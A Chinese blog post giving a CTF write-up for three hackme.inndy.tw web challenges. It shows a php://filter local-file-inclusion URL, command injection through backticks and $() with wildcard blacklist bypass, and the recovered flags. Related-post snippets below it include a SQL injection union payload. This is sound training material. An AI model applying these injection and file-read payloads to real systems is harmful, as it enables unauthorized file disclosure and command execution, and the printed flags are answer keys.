hackme 边做边记录

最新推荐文章于 2024-09-03 19:19:55 发布
最新推荐文章于 2024-09-03 19:19:55 发布
阅读量608 收藏 1
点赞数
分类专栏: web 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m1785717/article/details/83277498
版权
  1. LFI

在login界面查看源代码得到提示

<a href="?page=pages/flag">Flag</a>

想到使用封装协议读取php文件,URL如下:

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag

得到php源码

Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWlyZSgnY29uZmlnLnBocCcpOyA/Pj8K

Can you read the flag<?php require('config.php'); ?>?

接着包含config文件,url如下:

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/config

读取php源码:

PD9waHAKCiRmbGFnID0gIkZMQUd7WW9vb29vb19MRklfZzAwZF8yY1h4c1hTWVA5RVZMcklvfSI7Cg==

解密得到flag:FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}

  1. homepage

在源代码里面看到js:<script src="cute.js"></script>
点进去是aaencode编码,解码成一个二维码,扫描得flag:FLAG{Oh, You found me!!!!!! Yeeeeeeee.}

  1. ping
    命令执行,看到黑名单,没有过滤可以进行命令替换的反引号` 和$()
`ls`

或者

$(ls)

读到flag.php,黑名单过滤了flag,可以用?来通配,由于限制输入长度,所以用`

`sort ????????`

得到flag:FLAG{ping_$(capture-the-flag)_UtUbtnvY5F9Hn5dR}

南方还是花房
关注
专栏目录
hackme(web wp)
Xi4or0uji
09-06 4334
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&amp;id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&amp;id=-1 union select 1,2,(select table_name fr...
web记录(buuoj,jarvis,攻防世界,bugku,hackme)
CJB6988125的博客
11-19 1万+
web题笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
HACK ME靶机
qq_49101841的博客
10-01 1203
❀本篇关于信息安全实训时靶场训练的操作笔记。
靶机通关| hackme.ova通关攻略
a96482的博客
07-29 400
GitHub - foryujian/yjdirscan: 御剑目录扫描专业版,简单实用的命令行网站目录扫描工具,支持爬虫、fuzz、自定义字典、字典变量、UA修改、假404自动过滤、扫描控速等功能。发现共有5个网址,通过一一访问,我们并没有发现注入点,但该站点有注册、登录功能,我们可以去注册、登录进去看是否有注入点。该网站有登录,注册界面,我们可以尝试二次注入,但是由于没有修改账户的页面,也宣告失败。我们注册后会发现,会在页面上显示用户名,可以尝试XSS注入,但是失败了。最后经判断为sql注入类型。
【靶机渗透】HACKME: 1
安全狐
07-19 979
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
[攻防世界]hackme
逆向萌新的博客
06-23 276
[攻防世界]hackme
hackme通关攻略
最新发布
m0_73771249的博客
09-03 574
输入'报错,#闭合成功,共有三列。使用BP抓包,修改后缀名上传。
hackme.inndy.tw的一些Writeup(5月30更新)
热门推荐
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
hackme-1打靶记录
wwd180的博客
06-12 110
实验主机:hackme-1靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限。
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6911
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
012-Web安全基础8 - 实战练习.pptx
10-22
此外,攻击者甚至可能利用这种注入尝试插入新的用户记录,如 `'INSERT INTO FSB_USERS (USER_NAME, LOGIN_ID, PASSWORD, CREATION_DATE) VALUES('HAX0R12', 'HACKME12', 'EASY32', GETDATE());--`,这将创建一个名为...
Hackme-Crypto-wp
qq_41509200的博客
09-13 591
Hackme-Crypto-wp 背景: 这几天老师要求我们把hackme的题目出来,于是便开始了新的征程,一定把全部flag找出来,fighting… 题目及解题思路 1、easy 526b78425233745561476c7a49476c7a4947566863336b7349484a705a3268305033303d 利用经验觉得像16进制转字符串,于是找个在线网站试试 还真有点...
Hackme-Web-wp
qq_41509200的博客
09-13 2136
Hackme-Web-wp 背景: 这几天老师要求我们把hackme的题目出来,于是便开始了新的征程,一定把全部flag找出来,fighting… 题目及解题思路 1、hide and seek Can you see me? I’m so close to you but you can’t see me. 题目描述说离我很近,于是便翻翻网页源代码,果真发现了flag FLAG{0h U...
Hackme Writeup
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
攻防世界--hackme
Hk_Mayfly的博客
01-18 267
测试链接:https://adworld.xctf.org.cn/media/task/attachments/33009710e3f44f04b5a4cdbaaa46f00a 1.准备 获取信息 64位文件 2.IDA打开 __int64 __fastcall sub_400F8E(__int64 a1, __int64 a2) { char v3[136]; // [rs...
攻防世界-hackme
qq_70851535的博客
11-19 338
逆向分析
Hackme-Misc-wp
qq_41509200的博客
09-13 1321
Hackme-Misc-wp 背景: 这几天老师要求我们把hackme的题目出来,于是便开始了新的征程,一定把全部flag找出来 题目及解题思路 1、Flag All flags are in this format: FLAG{This is flag’s format} 题目描述中就是flag FLAG{This is flag's format} 2、corgi can fly ...
攻防世界逆向高手题之hackme
沐一 · 林 的博客
08-30 1020
攻防世界逆向高手题之hackme 继续开启全栈梦想之逆向之旅~ 这题是攻防世界逆向高手题的hackme 下载附件,照例扔入exeinfope中查看信息: 64位ELF文件无壳,照例扔入IDA64中查看伪代码信息,有main函数看main函数,结果没有main函数: . 没有main函数就运行程序收集显示信息: 找到两个字符串,直接在strings窗口双击跟踪,找到主要逻辑函数: . 这里积累第一个经验:如第一个红框所示, sub_407470((unsigned int)“Give me the
hackme inndy pwn rsbo writeup
charlie_heng的专栏
01-01 644
因为rsbo和rsbo2是同一题,所以就直接rsbo2了 首先看看程序 init函数那里用时间和flag生成了一个seed,所以不能预测rand产生的值 然后是读了0x80个byte,这里有一个栈溢出 但是接下来那个for循环就有点棘手了,想了半天想不到,就去看了下别人的wp,发现是送了104个字节的\x00,这里这样的原因是当修改到v8的值的时候,可以修改为0,这样就跳出for循...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值